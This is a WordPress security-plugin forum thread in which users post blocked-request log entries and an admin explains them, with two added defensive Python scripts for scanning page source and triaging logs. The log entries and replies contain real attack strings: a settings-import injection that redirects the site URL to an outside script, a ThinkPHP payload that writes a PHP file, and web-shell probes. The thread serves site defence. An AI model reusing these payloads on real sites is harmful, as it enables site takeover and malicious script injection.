Security Log Event Codes

Viewing 14 posts - 76 through 89 (of 89 total)
    #35544
    Bub
    Participant

    Done and done…. Thanks. This topic should now be closed.

    #35545
    Bub
    Participant

    Again, thanks.

    #37723
    sergeykar
    Participant

    I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing its job – however, is there a weakness this attempt is trying to exploit?

    [403 GET Request: 06.08.2019 - 10:15]
    BPS: 3.5
    WP: 5.2.2
    Event Code: WPADMIN-SBR
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 159.69.154.78
    Host Name: static.78.154.69.159.clients.your-server.de
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

    #37724
    AITpro Admin
    Keymaster

    This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code.  To check if your website is hacked do the steps below:

    1. Go to your website’s home page.
    2. Right mouse click and click View page source (Google Chrome) or a similar command for other Browsers.
    3. Use your Browser’s Find… command (Google Chrome – located under settings > Find…) and enter this search string:  nd_options
    4. If you see/find Source Code that looks like this below then your website is hacked.
    5. Let me know if your Browser Find/Search finds any search results or not.

    httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
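
The same search run over a saved copy of the page source, as an added example that is not part of the reply above or of BPS. It goes one step beyond the browser Find by also matching the marker when it is percent-encoded or written with HTML entities; `SAMPLE_SOURCE` is constructed and the function names are hypothetical.

```python
import html
from urllib.parse import unquote

MARKER = "nd_options"  # search string given in the reply above

# Constructed page source: line 3 carries the marker percent-encoded.
SAMPLE_SOURCE = """\
<html><head><title>Home</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<a href="/wp-admin/admin-ajax.php?nd%5Foptions_value_import_settings=siteurl">x</a>
</head><body>Welcome</body></html>
"""

def normalise(line):
    """Undo HTML entities and percent-encoding so an encoded marker still matches."""
    previous = None
    while line != previous:  # repeat until stable to undo nested encoding
        previous, line = line, unquote(html.unescape(line))
    return line.lower()

def find_marker(source, marker=MARKER, context=60):
    """Return (line number, snippet) for every line of page source containing the marker."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        flat = normalise(line)
        at = flat.find(marker.lower())
        if at != -1:
            hits.append((number, flat[max(0, at - context): at + len(marker) + context]))
    return hits

if __name__ == "__main__":
    for number, snippet in find_marker(SAMPLE_SOURCE):
        print(f"line {number}: {snippet}")
```

An empty result corresponds to the browser Find returning no matches in step 5.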

    #39337
    Chris Moon
    Participant

    Found this in my Security Log and not sure what it means:

    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla

    #39338
    AITpro Admin
    Keymaster

    @ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities.  The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder.  So these recons/searches were blocked by the BPS Pro Plugin Firewall.

    #39340
    Chris Moon
    Participant

    Thanks Ed, that’s reassuring.

    #42015
    bataraha
    Participant

    Thanks for confirming the solution.  Also we are trying several different methods to try and get the exact solution that is needed in Phase 2 Security Log Solution Targeting on the frontend of the site so that it is logged with the exact solution in the Security Log, but we keep running into a website performance problem.  A website performance decrease of even .1 (point 1) seconds is not acceptable so it is looking like the backend troubleshooting tool is going to be the only way to go.

    #42016
    AITpro Admin
    Keymaster

    @ bataraha – BPS does not cause any website performance slowness and can actually speed up website performance.

    #42090
    Max Parker
    Participant

    interesting information

    #42476
    Larisa
    Participant

    Event 4738 is generated every time a user object is changed. At times, this event may not show any changes—that is, all Changed Attributes appear as “-.” This usually happens when a change is made to an attribute that is not listed in the event. In this case, there’s no way to determine which attribute was changed.

    4672: Special privileges assigned to new logon. This event lets you know whenever an account assigned any “administrator equivalent” user rights logs on. For instance you will see event 4672 in close proximity to logon events (4624) for administrators since administrators have most of these admin-equivalent rights.

    #42670
    meets korun
    Participant

    thanks

    #43832
    Sanjeev
    Participant

    If the plugin isn’t installed, treat any requests related to it as potential hacker activity. No need to engage; simply ignore as it’s unrelated to your site’s setup.
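
A triage of Security Log entries along the lines of reply #39338 and the post above, as an added example that is not code from BPS or from any poster: it parses the log layout shown in this thread and, per source host, separates probes for plugins that are installed from probes for plugins that are not. `SAMPLE_LOG`, its host names and the installed-plugin set are constructed; the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample in the Security Log layout posted in this thread.
SAMPLE_LOG = """\
[403 GET Request: September 19, 2020 - 23:57]
Event Code: PFWR-PSBR-HPRA
Host Name: scanner.example.net
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php

[403 GET Request: September 19, 2020 - 23:57]
Event Code: PFWR-PSBR-HPRA
Host Name: scanner.example.net
REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js

[403 GET Request: 06.08.2019 - 10:15]
Event Code: WPADMIN-SBR
Host Name: other.example.org
REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl
"""

ENTRY_START = re.compile(r"^\[(\d{3}) (\w+) Request: (.+)\]$")
PLUGIN_SLUG = re.compile(r"^/wp-content/plugins/([^/?]+)/")

def parse_entries(text):
    """Split a Security Log dump into one dict of fields per entry."""
    entries, current = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        start = ENTRY_START.match(line)
        if start:
            current = {"status": start.group(1), "method": start.group(2)}
            entries.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")
            current[key.strip()] = value.strip()
    return entries

def triage(entries, installed):
    """Per source host: plugin slugs probed, split by whether the plugin is installed."""
    report = defaultdict(lambda: {"installed": set(), "not_installed": set(), "hits": 0})
    for entry in entries:
        slug = PLUGIN_SLUG.match(entry.get("REQUEST_URI", ""))
        if slug is None:
            continue  # not a request for a file under /wp-content/plugins/
        host = entry.get("Host Name") or "unknown"
        bucket = "installed" if slug.group(1) in installed else "not_installed"
        report[host][bucket].add(slug.group(1))
        report[host]["hits"] += 1
    return dict(report)
```

Call it as `triage(parse_entries(log_text), installed={...})`; slugs under `installed` are the ones worth checking against the plugin's current patched version, while `not_installed` slugs are background scanning.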
